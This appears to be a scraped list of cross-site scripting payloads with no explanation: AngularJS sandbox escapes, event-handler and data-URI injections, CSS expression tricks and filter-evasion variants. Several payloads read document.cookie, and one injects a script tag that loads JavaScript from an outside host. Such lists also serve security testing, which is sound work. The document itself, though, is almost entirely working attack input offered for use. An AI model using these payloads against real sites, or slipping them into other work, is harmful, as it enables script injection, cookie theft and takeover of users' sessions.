{{constructor.constructor('eval(atob("YWxlcnQoMSk="))')()}}

{{constructor.constructor('prompt(1)')()}}

{{constructor.constructor(valueOf.name.constructor.fromCharCode(97,108,101,114,116,40,49,41,10))()}}

/cpanelwebcall/<img src=x onerror="prompt(1)">aaaaaaaaaaaa

{{c=''.sub.call;b=''.sub.bind;a=''.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';astNode.argument={type:'Identifier',name:'foo'};");m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a=''.sub;$eval('a(b.c)');[].push.apply=a;}}

{{c=''.sub.call;b=''.sub.bind;c.$apply=$apply;c.$eval=b;$root.$$phase=null;$root.$digest=$on; C=c.$apply(c);B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='alert(1)';astNode.argument={type:'Identifier'};");m1=$$asyncQueue.pop().expression;m2=B(C,null,m1);[].push.apply=m2;$eval('B(b)');}}

d1bvs%3c%2fscript%3e%3cscript%3ealert(`XSS`)%3c%2fscript%3ec579g

d1bvs</script><script>alert(`XSS`)</script>c579g

"><D3V%0aONPoiNtERENTEr%0d=%0d[document.cookie].find(confirm)%0dx>

“><D3V%0aONPoiNtERENTEr%0d=%0d[document.cookie].find(confirm)%0dx>

<d3v/onauxclick=[2].some(confirm)>click

<d3v/onauxclick=(((confirm)))``>click

<d3v/onmouseleave=[2].some(confirm)>click

d="alert('XSS');")";

<data id=x tabindex=1 onfocus=alert(1)></data>

<datalist id="xss"><option value="&lt;script&gt;alert('XSS')&lt;/script&gt;"></datalist>

data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy1zYWx0LnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==

data:text/html;base64,Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KGRvY3VtZW50LmNvb2tpZSk7PjEy

data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=

data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg

data:text/html,<script>alert(0)</script>

<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc(`VulneravelXSS`%26%2300000000000000000041//

<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>

<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>

<details onauxclick=confirm`xss`></details>

<details+/'on+/ontoggle=1^confirm(document.domain)+open//

<details ontoggle=alert(1) open>test</details>

<details open id="' &quot;'"ontoggle=alert(1)>

<details/open/ontoggle=alert()>

<details/open/ontoggle="alert`1`">

<details open ontoggle="{alert`1`}"></details>

<details open ontoggle="alert(1)"><summary>Click me!</summary></details>

<details/open/ontoggle=(confirm)()//

">'><details/open/ontoggle=confirm('XSS')>

>'><details/open/ontoggle=confirm('XSS')>

"><details/open/ontoggle=confirm("/xss_by_Y000!/")>

<"><details/open/ontoggle="jAvAsCrIpT&colon;alert&lpar;/xss-by-tarun/&rpar;">XXXXX</a>

"><details/open/ontoggle=prompt("/test/")>

<details open ontoggle='self["ale"%2b"rt"]&lpar;document&period;domain&rpar;'>

<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">

<details/open=/Open/href=/data=;+ontoggle="(alert)(document.domain)

<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">

<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061;lert&#x000000028;origin&#x000029;>

dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi

<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>

"><div class=progress><div onwebkitanimationstart=prompt(document.domain)>

<div data-url="javascript:alert('XSS')"></div>

<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>

<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>

<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">

<div>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>

'">><div><meter onmouseover="alert(1)"</div>"

<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>

<div oncopy="alert('XSS')">Copy me</div>

<div onkeyup="alert('XSS')">Press a key</div>

<div/onmouseover='alert(1)'> style="x:">

<div onmouseover='alert&lpar;1&rpar;'>DIV</div>

<div onpointerenter="alert(45)">MOVE HERE</div>

"><div onpointerrawupdate="console.log('XSS')">Click_Here_Click_Here_Click_Here_Click_Here_Click_Here_Click_Here_Click_Here_ClickHere</div>

"><div onpointerrawupdate="console.log('XSS')"></div><!--

<DIV STYLE="background-image:07507206C028'06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029'029">

<DIV STYLE="background-image: url(&#1,javascript:alert('XSS))">

<DIV+STYLE="background-image: url(javascript:alert(1))">

<div style="background-image:url(javascript:alert('Successful XSS'))">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="background-image: url(javascript:javascript:alert(1))">

"<div style="background-image: url(x)" onerror=prompt(document.domain);>

"><div style="background-image: url(x)" onerror=prompt(document.domain);>

<div style="border-image-source: url(javascript:alert('XSS'));">

<div style="content: url(javascript:alert('XSS'));">

<div style="cursor: url(javascript:alert('XSS')), auto;">

<div style="list-style-image: url(javascript:alert('XSS'));">

<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>

<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x

<div style="width:expression(alert('XSS'))">

<DIV STYLE="width: expression(alert('XSS'));">

<div/style="width:expression(confirm(1))">X</div> {IE7}

<DIV STYLE="width:expression(javascript:alert(1));">

<div v-html="''.constructor.constructor('alert(1)')()">a</div>

';document.addEventListener('DOMContentLoaded', function(){var c = function(){a();};var s = document.createElement('script');s.src = 'https://n.0x7359.com/xss.js';s.onreadystatechange = c;document.body.appendChild(s);});//

";document.body.addEventListener("DOMActivate",confirm(1))

Read more

Testimonials

Nothing to show.